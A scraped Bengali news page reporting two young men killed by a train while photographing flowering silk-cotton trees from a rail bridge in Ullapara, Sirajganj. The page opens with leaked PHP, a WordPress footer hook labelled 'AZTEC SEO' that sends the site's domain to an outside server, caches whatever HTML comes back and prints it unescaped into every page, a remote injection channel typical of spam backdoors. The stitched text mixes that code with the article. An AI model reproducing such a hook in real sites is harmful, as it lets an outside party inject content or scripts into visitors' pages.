/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); ছবি তুলতে গিয়ে ট্রেনের ধাক্কায় দুই যুবক নিহত | Dhaka Sky News

নারীকে ফাঁদে ফেলে তরমুজ খেতে নিয়ে সংঘবদ্ধ ধর্ষণের অভিযোগ

আগের সংবাদ

নিয়ন্ত্রণ হারিয়ে তেলবাহী ট্রাক পদ্মায়

পরের সংবাদ

ছবি তুলতে গিয়ে ট্রেনের ধাক্কায় দুই যুবক নিহত

ঈশ্বরদী-ঢাকা রেলপথে সিরাজগঞ্জের উল্লাপাড়ার ঘাটিনা রেল সেতুর ওপর ছবি তুলতে গিয়ে ট্রেনের ধাক্কায় দুই যুবক নিহত হয়েছেন।
বৃহস্পতিবার (১২ মার্চ) দুপুর ২টার দিকে ঢাকা থেকে রংপুরগামী রংপুর এক্সপ্রেস ট্রেনের থাক্কায় ওই দুই যুবকের মৃত্যু হয়।
নিহতরা হলেন- সিরাজগঞ্জের বেলকুচি উপজেলার দেলুয়া গ্রামের আব্দুল লতিফের ছেলে আলফি সানি (১৮) ও একই উপজেলার ধুকুরিয়া বেড়া গ্রামের আক্তার হোসেনের ছেলে ফয়সাল (১৯)।
তারা দুজন মোটরসাইকেল নিয়ে রেলপথের শিমুল ফুলের মহাসমারহ উপভোগ করতে এখানে এসেছিলেন।
স্থানীয়রা জানান, করতোয়া নদীর পূর্ব প্রান্তে রেলপথের প্রায় আধা কিলোমিটার অংশজুড়ে সারি সারি শিমুল গাছ রয়েছে। প্রতিবছর এ সময় গাছগুলো ফুলে ফুলে ছেয়ে যায়। প্রতিদিন স্থানীয় ও পার্শ্ববর্তী এলাকার শত শত প্রকৃতিপ্রেমী নারী-পুরুষ এখানে ঘুরতে আসেন। এ সময় কিছু অতি উৎসাহী যুবক রেলসেতুতে উঠে নানা আঙ্গিকে ছবি তোলেন। প্রায় দিনই এই পথে ট্রেন চলাচল বিঘ্নিত হয়।
প্রত্যক্ষদর্শীরা জানান, এক সপ্তাহ আগে উল্লাপাড়া থেকে ঢাকামুখী ছেড়ে আসা পদ্মা এক্সপ্রেস ট্রেনটি ঘাটিনা রেল সেতু অতিক্রমের সময় বার বার হুইসেল দিলেও ব্রিজের ওপর থেকে দর্শনার্থীরা না নামায় ট্রেনটিকে ব্রিজে দাঁড়িয়ে যেতে হয়। পরে লোকজন নেমে গেলে ট্রেনটি ব্রিজ অতিক্রম করে।
এছাড়াও বুধবার (১১ মার্চ) বিকালে একাধিক যুবক ব্রিজে উঠে ছবি তোলার সময় ঢাকা থেকে রাজশাহীগামী সিল্কসিটি আন্তঃনগর ট্রেন অনেক দূর থেকে হুইসেল বাজিয়ে ওই সেতু অতিক্রম করতে গেলে মারাত্মক ঝুঁকিতে পড়ে দুই যুবক। এ সময় রেল সেতুর সঙ্গে যুক্ত দাঁড়ানোর স্থান থেকে কয়েকজন এদেরকে হাত ধরে দ্রুত টেনে নেওয়ায় অল্পের জন্য মৃত্যুর হাত থেকে রক্ষা পায় ওই দুই যুবক। এই দৃশ্যের ভিডিওটি বুধবার সন্ধ্যা থেকে সামাজিক যোগাযোগে ভাইরাল হয়।